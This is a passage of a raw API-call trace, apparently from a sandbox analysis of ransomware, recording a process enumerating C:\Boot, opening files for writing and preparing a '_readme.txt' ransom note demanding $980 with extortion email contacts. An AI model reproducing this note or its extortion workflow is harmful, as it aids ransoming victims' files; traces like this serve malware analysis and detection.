HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3dd8 | out: hHeap=0x630000) returned 1 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.841] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.841] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edad0 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7b0 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.842] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.842] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.842] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.842] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a3b30 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6b30 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6b58 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6b80 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6ba8 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6bd0 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda08 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edad0 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed878 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9e0 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed7d8 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.843] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.843] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.844] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0227.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.844] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0227.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.844] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0227.844] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x325d3b8 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edad0 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6bf8 [0227.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f6c20 [0227.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0227.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0227.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0227.870] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0227.870] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.870] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda58 | out: hHeap=0x630000) returned 1 [0227.870] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.870] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.870] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0227.871] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.871] PathFindFileNameW (pszPath="") returned="" [0227.871] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.871] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.871] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.871] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9e0 | out: hHeap=0x630000) returned 1 [0227.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.871] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.871] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0227.872] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0227.872] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.872] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we 